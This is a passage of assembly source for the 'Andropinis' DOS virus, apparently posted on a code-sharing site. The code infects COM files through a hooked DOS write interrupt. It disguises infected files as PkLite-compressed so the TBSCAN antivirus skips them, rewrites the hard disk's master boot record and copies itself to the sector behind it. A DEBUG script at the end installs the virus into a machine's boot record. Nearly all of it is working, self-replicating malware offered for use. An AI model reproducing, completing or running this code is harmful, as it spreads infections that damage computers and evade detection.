📄 andropin.asm
字号:
int 2f ; belongs to the handle in bx
mov bl,byte ptr es:[di] ;
mov ax,1216 ;
int 2f ;
mov bx,2020 ; check if the file has a com
mov ax,word ptr es:[di+28] ; extension
or ax,bx ;
cmp ax,'oc' ;
jne not_suitable ;
mov al,byte ptr es:[di+2a] ;
or al,bl ;
cmp al,'m' ;
jne not_suitable ;
cmp word ptr es:[di+11],0 ; check if file length is
jne not_suitable ; zero
cmp cx,1000 ; check if piece of code is
jb not_suitable ; not too short or too long
cmp cx,0f000 ;
ja not_suitable ;
pop es ; these registers are done
pop di ;
pop dx ;
mov bx,dx ; check if the file is a
cmp word ptr ds:[bx],'ZM' ; renamed exe file
je is_renamed_exe ;
cmp word ptr ds:[bx+2],0e990 ; check if already infected
jne infect_com ;
jmp is_renamed_exe
not_suitable: pop es ; done with this interrupt
pop di ; service routine, so chain
pop dx ; to the old 21 routine
is_renamed_exe: pop bx ;
pop ax ;
jmp eoi_21 ;
;******************************************************************************
; piece of code that infects a COM file
;******************************************************************************
infect_com: pop bx ; this register was done
push cx ; get the first 6 bytes of the
push si ; host and overwrite them with
add cx,offset com_entry-6 ; the new bytes. it places a
mov si,dx ; nifty piece of code to
mov ax,'KP' ; render tbscans heuristics
xchg word ptr [si],ax ; useless. the PUSH AX, DEC BX
mov word ptr cs:org_com,ax ; (PK) in the begin of the
lodsw ; program makes tbscan think
mov ax,0e990 ; it is a PkLite compressed
xchg word ptr ds:[si],ax ; file and will skip it!
mov word ptr cs:org_com+2,ax ;
lodsw ;
xchg word ptr ds:[si],cx ;
mov word ptr cs:org_com+4,cx ;
pop si ;
pop cx ;
pop ax ; perform original write
pushf ; command
call dword ptr cs:[old_21] ;
push ax ; and append the virus at the
push cx ; end of the file
push dx ;
push ds ;
push cs ;
pop ds ;
mov ah,40 ;
mov cx,virus_length_b ;
lea dx,virus ;
pushf ;
call dword ptr cs:[old_21] ;
pop ds ;
pop dx ;
pop cx ;
pop ax ;
retf 2 ;
;******************************************************************************
; this gets executed by an infected COM file
;******************************************************************************
com_entry: call get_offset ; old hat for getting the
get_offset: pop bp ; delta offset
sub bp,offset get_offset ;
mov ax,5001 ; if the virus is resident it
int 13 ; doesn't need to infect the
cmp ax,0150 ; master boot record
je is_active ;
mov ax,0201 ; read master boot record.
lea bx,heap[bp] ; if an error occured, goto
mov cx,1 ; is_active
mov dx,80 ;
int 13 ;
jc is_active ;
cmp word ptr [bx+1be+1],0101 ; test if the partition begins
jne is_active ; at the normal sector
test byte ptr [bx+1be],80 ; test of the partition is
jz is_active ; bootable
mov al,byte ptr [bx+1be+4] ; test if the partition type
cmp al,4 ; is ok
jb is_active ;
cmp al,6 ;
ja is_active ;
mov word ptr [bx+1be+1],200 ; change pointer to virus code
mov ax,0301 ; write back the master boot
push ax ; record. quit if error
int 13 ; occured
pop ax ;
jc is_active ;
inc cx ; write virus to sector 2
lea bx,virus[bp] ; (right behind the mbr)
int 13 ;
is_active: lea si,org_com[bp] ; restore beginning of the
mov di,100 ; host and execute it
pop ax ;
push cs ;
push di ;
movsw ;
movsw ;
movsw ;
retf ;
;******************************************************************************
; some data used by the virus
;******************************************************************************
db '[Andropinis]' ; my childs name
db ' by Rajaat',0 ; my name
org 1fe ; for the bootsector
db 55,0aa ; boot signature
;******************************************************************************
; the things below aren't copied into the viral boot sector, only in COM files
;******************************************************************************
org_com equ $ ; original program data
heap equ $+6 ; memory for data
virus_length_b equ heap-virus ; who says size doesn't count?
virus_length_s equ (virus_length_b+1ff) / 200 ;
virus_length_k equ (virus_length_b+3ff) / 400 ;
old_13 equ heap+6 ; old int 13 vector
old_21 equ heap+0a ; old int 21 vector
hook_21_flag equ heap+0e ; int 21 hook flag
end virus ; the end complete
end ;
;******************************************************************************
; remove the piece below if you use A86 instead of TASM, because it will
; choke on it
--- debug script for installing the Andropinis virus ---
install with
DEBUG ANDROPIN.BIN < scriptname
where scriptname is the name that you give to the mess below
--- cut here ---
m 100 l200 1000
a
mov ax,0201
mov bx,800
mov cx,1
mov dx,80
int 13
mov si,9bf
mov word ptr [si],200
mov ax,0301
mov dx,80
int 13
mov ax,0301
mov bx,1000
inc cx
int 13
int 20
g
q
--- cut here ---
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -